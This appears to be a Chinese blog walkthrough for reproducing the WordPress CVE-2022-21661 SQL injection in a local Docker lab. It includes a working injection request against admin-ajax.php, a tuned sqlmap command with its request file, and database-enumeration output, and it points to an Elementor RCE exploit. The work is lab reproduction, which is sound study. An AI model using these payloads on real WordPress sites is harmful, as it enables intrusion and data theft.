docker WellingtonEspindula/SSI-CVE-2022-21661 sqlmap+json一键梭哈

cd /tmp;
git clone https://github.com/WellingtonEspindula/SSI-CVE-2022-21661/
apt  install -y docker-compose  &
docker pull mysql:5.7 ;docker pull  wordpress:5.8.1 ; docker pull  wordpress:cli;


root@ip-10-0-13-26:/tmp/SSI-CVE-2022-21661# dpkg -l | grep docker-compose
ii  docker-compose                       1.29.2-1                                all          define and run multi-container Docker applications with YAML
root@ip-10-0-13-26:/tmp/SSI-CVE-2022-21661# 

自定义docker-compose.yml ,自己修改后的就叫:Gdocker-compose.yml

version: "3.3"
services:
  db:
    image: mysql:5.7
    volumes:
      - db_data:/var/lib/mysql
    ports:
      - 33060:3306
    restart: always
    environment:
      MYSQL_ROOT_PASSWORD: somewordpress
      MYSQL_DATABASE: wordpress
      MYSQL_USER: wordpress
      MYSQL_PASSWORD: wordpress
    healthcheck:
      test: mysqladmin ping -h 127.0.0.1 -u $MYSQL_USER --password=$MYSQL_PASSWORD
      start_period: 5s
      interval: 5s
      timeout: 5s
      retries: 55

  wordpress:
    depends_on:
      db:
        condition: service_healthy
    image: wordpress:5.8.1
    ports:
      - 8000:80
    restart: always
    environment:
      WORDPRESS_DB_HOST: db:3306
      WORDPRESS_DB_NAME: wordpress
      WORDPRESS_DB_USER: wordpress
      WORDPRESS_DB_PASSWORD: wordpress
      WORDPRESS_TABLE_PREFIX: "wp_"
      WORDPRESS_DEBUG: 1
    volumes:
      - wp_data:/var/www/html

  wordpress-cli:
    depends_on:
      - db
      - wordpress
    image: wordpress:cli
    user: root
    stdin_open: true 
    tty: true
    environment:
      WORDPRESS_DB_HOST: db:3306
      WORDPRESS_DB_NAME: wordpress
      WORDPRESS_DB_USER: wordpress
      WORDPRESS_DB_PASSWORD: wordpress
    command: >
      /bin/sh -c '
      id;
      cat /etc/hosts;
      ip add;
      sleep 3;
      wp --allow-root core install --url="http://127.0.0.1:8000" --title="CVE2022-21661" --admin_user=admin --admin_password=admin --admin_email=foo@bar.com;
      wp --allow-root plugin install elementor  --version=3.5.0  --activate;
      wp --allow-root plugin install ele-custom-skin --version=3.1.3 --activate;
      wp --allow-root theme install hello-elementor --version=2.5.0 --activate;
      wp --allow-root user create tom tom@tom.com          --user_pass="weakpassword";
      wp --allow-root user create leo leo@leo.com          --user_pass="strongpassword";
      wp --allow-root user create bassam bassam@bassam.com --user_pass="pinto99";
      chown -R 33:33 /var/www/html;
      chmod -R 0777 /var/www/html;
      cat /etc/passwd;
      wp config set WP_DEBUG true --raw --allow-root;
      wp config set WP_DEBUG_LOG true --raw --allow-root;
      wp config set WP_DEBUG_LOG "/var/www/html/aab.log" --allow-root;
      wp config set WP_DEBUG_DISPLAY true --raw --allow-root;
      bash;
      '
    volumes:
      - wp_data:/var/www/html

volumes:
  db_data:
  wp_data:

wp --allow-root plugin install elementor --version=3.6.2 --activate;

这个3.6.2版本也是可以的,况且存在这个漏洞,可以一起测试

#https://www.exploit-db.com/exploits/50882

#WordPress Plugin Elementor 3.6.2 - Remote Code Execution (RCE) (Authenticated)

启动3个docker:

docker-compose -f /tmp/SSI-CVE-2022-21661/Gdocker-compose.yml  up -d 

查看日志:

docker logs -f ssi-cve-2022-21661_wordpress-cli_1 ;

mysql容器连接测试:

docker exec -it  ssi-cve-2022-21661_db_1  bash

mysql  -h 127.0.0.1 -u wordpress --password=wordpress -e "select now();"

使用curl进行sql注入测试(参考SSI-CVE-2022-21661/example.md at master · WellingtonEspindula/SSI-CVE-2022-21661 · GitHub):

curl -x http://127.0.0.1:8080/  -i --compressed -k -X $'POST' \
    -H $'Host: 127.0.0.1:8000' -H $'User-Agent: python-requests/2.28.1' -H $'Accept-Encoding: gzip, deflate, br' -H $'Accept: */*' -H $'Connection: keep-alive' -H $'Content-Length: 287' -H $'Content-Type: application/x-www-form-urlencoded' \
    --data-binary $'action=ecsload&query=%7b%22tax_query%22%3a%7b%220%22%3a%7b%22field%22%3a%22term_taxonomy_id%22%2c%22terms%22%3a%5b%22%22%5d%7d%7d%7d&ecs_ajax_settings=%7b%22post_id%22%3a%221%22%2c%20%22current_page%22%3a1%2c%20%22widget_id%22%3a1%2c%20%22theme_id%22%3a1%2c%20%22max_num_pages%22%3a10%7d' \
    $'http://127.0.0.1:8000/wp-admin/admin-ajax.php'

http://127.0.0.1:8080/ 是burpsuite 2022起的http代理,方便观察.

祭出大杀器sqlmap:

set cmdpath2024=c:\Python310\python

%cmdpath2024% E:\BaiduNetdiskDownload\sqlmapproject-sqlmap-796173f\sqlmap.py -vvv -r  ./rr2024.txt   --dbms=mysql --technique=E  --prefix="23)  " --suffix="#" --threads=4  --current-db --is-dba --dbs  --proxy=http://127.0.0.1:8080

# sqlmap 1.5.7.7#dev   ,  支持python3.10

rr2024.txt如下:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: curl/7.87.0
Accept: */*
Content-Length: 131
Content-Type: application/x-www-form-urlencoded
Connection: close

action=ecsload&query={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["1*"]}}}&ecs_ajax_settings={"post_id":"1", "current_page":1, "widget_id":1, "theme_id":1, "max_num_pages":10}

得到结果:

web server operating system: Linux Debian
web application technology: PHP 7.4.25, Apache 2.4.51
back-end DBMS: MySQL >= 5.1
[18:49:47] [INFO] fetching current database
[18:49:49] [INFO] retrieved: 'wordpress'
current database: 'wordpress'
[18:49:49] [INFO] testing if current user is DBA
[18:49:49] [INFO] fetching current user
[18:49:51] [INFO] retrieved: 'wordpress@%'
current user is DBA: False
[18:49:52] [INFO] fetching database names
[18:49:56] [INFO] retrieved: 'information_schema'
[18:49:56] [INFO] retrieved: 'wordpress'
[18:49:56] [DEBUG] performed 3 queries in 3.61 seconds
available databases [2]:
[*] information_schema
[*] wordpress

其它辅助参考资料:

https://github.com/daniel616/CVE-2022-21661-Demo


#wp --allow-root theme install https://downloads.wordpress.org/theme/hello-elementor.3.1.1.zip --activate

#wp --allow-root theme install /path/to/hello-elementor.3.1.1.zip --activate


#https://raw.githubusercontent.com/elementor/elementor/main/changelog.txt
# curl https://api.wordpress.org/plugins/info/1.0/elementor.json

#https://downloads.wordpress.org/plugin/elementor.3.25.1.zip
#https://downloads.wordpress.org/plugin/elementor.3.6.2.zip
#https://downloads.wordpress.org/plugin/elementor.3.11.0.zip


cd /tmp&&curl -vk4O  https://downloads.wordpress.org/theme/hello-elementor.2.1.0.zip
cd /tmp&&curl -vk4O  https://downloads.wordpress.org/theme/hello-elementor.2.5.0.zip
cd /tmp&&curl -vk4O  https://downloads.wordpress.org/theme/hello-elementor.2.7.0.zip




https://forum.butian.net/share/1324
漏洞简介
这是最近爆出来的一个 wordpress 的 SQL注入漏洞,实际上不是一个可以直接利用的洞,而是wordpress的一个核心函数 WP_Query的漏洞,这个函数常被插件使用,因此能造成的危害也挺大,前台后台都有可能。
相关推荐
Mao.O5 分钟前
RabbitMQ延迟消息插件安装(Docker环境)
docker·rabbitmq·延迟消息发送
神技圈子7 分钟前
【linux经典工具】作为一个合格的开发人员怎能不会tmux
linux·运维·服务器
龙萱坤诺9 分钟前
AI自动评论插件V1.3 WordPress插件 自动化评论插件
运维·人工智能·自动化
weixin_4483505010 分钟前
探索自动化数据清洗技术的前沿趋势
大数据·运维·自动化·数据治理·数据提取
Bold!20 分钟前
最新ubuntu22.04 下列软件包有未满足的依赖关系 解决方案
linux·运维·服务器
engchina27 分钟前
Oracle SQL Developer 同时打开多个table的设置
数据库·sql·oracle
你的月亮和太阳32 分钟前
EXPLAIN 针对性优化 SQL 查询
数据库·sql·oracle
追风少年亚索32 分钟前
[极客大挑战 2019]FinalSQL
数据库·sql
Kobebryant-Manba35 分钟前
sqlyog软件
java·sql
lipviolet36 分钟前
MySQL系列---sql优化
数据库·sql·mysql